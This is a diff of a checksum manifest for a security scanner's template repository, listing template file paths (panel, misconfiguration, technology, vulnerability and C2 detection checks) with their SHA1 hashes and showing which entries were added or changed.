http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4
http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4
http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9
http/exposed-panels/tiny-rss-panel.yaml:de8fb04fcf6c23c02809fccfb37249b02a89aa14
http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1
http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc
http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d
@ -4438,14 +4460,16 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf
http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767
http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd
http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339
http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d
http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7
http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672
http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a
http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6
http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42
http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e
http/exposed-panels/unleash-panel.yaml:be51937dd1d4f1ac7feadf1883b3026016d08f53
http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b
http/exposed-panels/uptime-kuma-panel.yaml:e1a6b283b6595f63cffa175755728ca7ff9cd3fe
http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88
http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a
http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d
http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc
@ -5074,6 +5098,7 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb
http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25
http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa
http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5
http/honeypot/tpot-honeypot-detect.yaml:d6bba366446a11da0938639a63c137fff9baf522
http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb
http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117
http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19
@ -5315,9 +5340,9 @@ http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a5
http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e
http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d
http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc
http/misconfiguration/gocd/gocd-cruise-configuration.yaml:5d6cff182941ab13f63a9670759c38e35bf48200
http/misconfiguration/gocd/gocd-encryption-key.yaml:a74d049cb9d02c3ab676794fcb6eb8905b175dd7
http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a
http/misconfiguration/gocd/gocd-cruise-configuration.yaml:afd6d002fdf184b81dc31d6774f5cf44c9949dba
http/misconfiguration/gocd/gocd-encryption-key.yaml:be6a8821d31748cd4dd513aa480f85039b05f505
http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:21d7318675025f7ca3566b9eb3c054fc7da276a4
http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f
http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238
http/misconfiguration/grafana-public-signup.yaml:0ca43758c6cefb8473b88d8799dc8083bbdb4b09
@ -5335,13 +5360,13 @@ http/misconfiguration/haproxy-status.yaml:cd67a127bba5cbe7592fcddf3f9e4abe9ffccb
http/misconfiguration/healthchecks-ui-exposure.yaml:5880a258da373e69f620756492fe363c88305114
http/misconfiguration/helm-dashboard-exposure.yaml:5d973ff4a1915a7fbbf754b9f5b3fc68146d07b9
http/misconfiguration/hfs-exposure.yaml:c274f6bce61713807f3886d7e4d3a6b58a8b5d74
http/misconfiguration/hikivision-env.yaml:36e1e58bdcadd6cb6d52b7929a57989aa2b0d98f
http/misconfiguration/hikvision-env.yaml:a6af8cc4bdf077654c1ca5091b987c3d081e4c32
http/misconfiguration/hivequeue-agent.yaml:df621ff4d3dbb3ea3e652c99fbea133eca2d3192
http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e30fdb4cc1430be
http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611
http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a
http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006
http/misconfiguration/https-to-http-redirect.yaml:9c60308f5bfe2dfc11ff9e1682bf68d0b204b3f5
http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e
http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463
http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1
http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421
@ -5365,6 +5390,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2
http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb
http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d
http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0
http/misconfiguration/installer/custom-xoops-installer.yaml:ee8a3bf092cb7c1efd90f278a5ad74e2f4442510
http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b
http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
@ -5376,6 +5402,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f
http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a
http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b
http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea
http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc
http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a
http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e
http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283
@ -5400,6 +5427,7 @@ http/misconfiguration/installer/mcloud-installer.yaml:833e2575e02b6336777860b535
http/misconfiguration/installer/metaview-explorer-installer.yaml:1b9dce3e9610d021aa211b44ed5397207c241be9
http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958ab70b00bcea40bf
http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b
http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71
http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a
http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9
http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2
@ -5419,6 +5447,7 @@ http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac0
http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a
http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08
http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d
http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6
http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0
http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49
http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91
@ -5430,6 +5459,7 @@ http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62a
http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d
http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c
http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8
http/misconfiguration/installer/setup-github-enterprise.yaml:4c9c45144ef261e828a016e779c788a97640107d
http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710
http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab
http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9
@ -5461,7 +5491,7 @@ http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed
http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a
http/misconfiguration/installer/zenphoto-setup.yaml:90123a5fbb91a4f9e860152c5f07d8a141669ed8
http/misconfiguration/intelbras-dvr-unauth.yaml:d03e03c47bafc20e0abed9052e731db888770f83
http/misconfiguration/internal-ip-disclosure.yaml:e6a79c10e8a84b1146826ec646fe0beb90b86761
http/misconfiguration/internal-ip-disclosure.yaml:ffb198989918d9f1e1cafafcd3470931ff6eaa4e
http/misconfiguration/iot-vdme-simulator.yaml:c4c40ebfaba9239c6e0c5f14e6957533cdb11631
http/misconfiguration/jaeger-ui-dashboard.yaml:4584cce5677c777fcde741579d1ba52bccec4491
http/misconfiguration/java-melody-exposed.yaml:3e4299de8400eb02ef9f769cc044e7255e87522e
@ -5497,7 +5527,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3
http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68
http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64
http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:017a97227ca466c4831450986e59a3c99ea1f781
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:bc55398c10b87bc6a5c507b4710e3462b264f935
http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3
http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d
http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef
@ -5595,7 +5625,6 @@ http/misconfiguration/server-status-localhost.yaml:920d65e7e9cd3d8b02094cc32aa42
http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202
http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9
http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b
http/misconfiguration/setup-github-enterprise.yaml:14bd64ce441f1a736a86cd8b6b5789d5e8be4792
http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0
http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d
http/misconfiguration/sitecore-lfi.yaml:1a0abe7d31d65b931c8e017a94fecc7e3086333c
@ -5654,7 +5683,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0
http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5
http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e
http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69
http/misconfiguration/titannit-web-exposure.yaml:7a171e9165d8f1a7467e018c320247c2eba80b9c
http/misconfiguration/titannit-web-exposure.yaml:90a7e87de3dc02e6f213e29f4d6bce3359464041
http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed
http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6
http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de
@ -5692,6 +5721,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8
http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0
http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569
http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320
http/misconfiguration/unigui-server-monitor-exposure.yaml:e3a54c9004bcf6d77aa157f31df9d027ed46c812
http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7
http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736
http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f
@ -6563,6 +6593,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8
http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77
http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b
http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd
http/technologies/apache/apache-answer-detect.yaml:0edd4322267dfd814e651abe28b611f686680736
http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd
http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495
http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507
@ -6603,6 +6634,7 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71
http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa
http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564
http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db
http/technologies/boa-web-server.yaml:f0f198ec1d26c859c0727b2b72fb8f4ed399a803
http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e
http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83
http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31
@ -6623,6 +6655,7 @@ http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff
http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e
http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3
http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559
http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74
http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6
http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94
http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8
@ -6682,7 +6715,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872
http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1
http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac
http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a
http/technologies/favicon-detect.yaml:20226a4707ea3e5d8e45845ff2ab3a2069fde0ff
http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e
http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd
http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2
http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9
@ -6728,6 +6761,7 @@ http/technologies/icecast-mediaserver-detect.yaml:e8cd04701c56d72863370946d98a0a
http/technologies/icecast-server-detect.yaml:9c420fa5e33996ea06f25259e6d07fbc940e416d
http/technologies/identity-server-v3-detect.yaml:1d81d62bf57fbefb494e082d68cb7e5568382f02
http/technologies/ilo-detect.yaml:71e46841d352f772fe4ef93feed925411dd00ad0
http/technologies/imgproxy-detect.yaml:a5819e528c4e6c397c971fe78e49fb76ba0e6820
http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee5
http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9
http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe
@ -6902,6 +6936,7 @@ http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93
http/technologies/spring-detect.yaml:915d140e39b0fd25c725861c526bd2852d3af20a
http/technologies/springboot-actuator.yaml:eea78a3c5ccc81b70826132839dd3531ebc07667
http/technologies/springboot-whitelabel.yaml:eb9058fb153f9146a1c1805473ec96199b243184
http/technologies/statamic-detect.yaml:9b14322353da40d62d366fab6d4e882025a6d761
http/technologies/strapi-cms-detect.yaml:ab2db3c715882e9487d6cfce22845c3cfb6a5168
http/technologies/subrion-cms-detect.yaml:79c424841060d17ac25109a9ec520c7e0c208bea
http/technologies/sucuri-firewall.yaml:4e60a53d2ddcc7b48dc6fcb42149747927a140b4
@ -6919,9 +6954,11 @@ http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d
http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137
http/technologies/tibco-spotfire-services-detect.yaml:26a79d78f2c140283420e74921930270ad17851a
http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab
http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795
http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864
http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4
http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636
http/technologies/uni-gui-framework.yaml:24da39f35b8c52b287e5c62359c6bdfffafc32a2
http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4
http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015
http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5
@ -7156,6 +7193,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5
http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553
http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:823e6d8fb3f52400cd29e17aa6e9d9e5215fb639
http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031
http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f
http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63
@ -7448,7 +7486,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d
http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01
http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e
http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b31d091364cfce9c3384b7db96cf236992d044f4
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:7866f3668d1f681eff787a1c2b9146a491251e11
http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e
http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2
http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064
@ -7613,6 +7651,7 @@ http/vulnerabilities/other/cacti-weathermap-file-write.yaml:7df8c70c271017c79e50
http/vulnerabilities/other/caimore-gateway-rce.yaml:8abeb38c5a0c6b11e9dfe4c7e363f9c839c2506e
http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb85769ed23d78433e243481a
http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e
http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff
http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067
http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d
http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199
@ -7729,7 +7768,7 @@ http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82
http/vulnerabilities/other/kingdee-erp-rce.yaml:cdbd8bc5ade00ea67e803b32e5ce9b9ee954cab6
http/vulnerabilities/other/kingsoft-v8-file-read.yaml:f1424aa109595b203a05d0c6b3b181ee3faf709e
http/vulnerabilities/other/kingsoft-vgm-lfi.yaml:920908a692b3c70d355b35dc730c20153f2f10c2
http/vulnerabilities/other/kiwitcms-json-rpc.yaml:e8b89bed712fc69f4294693e5af6f7a35fc3c2d0
http/vulnerabilities/other/kiwitcms-json-rpc.yaml:ce6d41bfb15c8218ccb1a6102888c78db08e4224
http/vulnerabilities/other/kodak-network-lfi.yaml:757f58aaa5d6318a5e343fee5fe250600bf82174
http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:ca4f7ab98104202417a24bfe05ccce4d9d63d18e
http/vulnerabilities/other/landray-oa-datajson-rce.yaml:c62e0ed298fd046d8b4b307bbab0f990535dac24
@ -8277,6 +8316,7 @@ javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f0
javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94
javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff
javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04
javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df
javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16
javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86
javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c
@ -8395,7 +8435,7 @@ network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a7
network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd
network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca
network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa
network/detection/weblogic-t3-detect.yaml:06f88de334b8bae8279d944c0cf4467919930e93
network/detection/weblogic-t3-detect.yaml:d9f9d79b5176d8eb2abd9bf4de3ce84a0220fd99
network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c
network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd
network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781
@ -8469,6 +8509,7 @@ profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8
profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2
profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8
ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa
ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91
ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521
@ -8498,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:435e6048b63deb8509219645aafa7043cc65537c
templates-checksum.txt:4cfa9d7c34a68646e25c38e6844c2f4bb42ef473
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4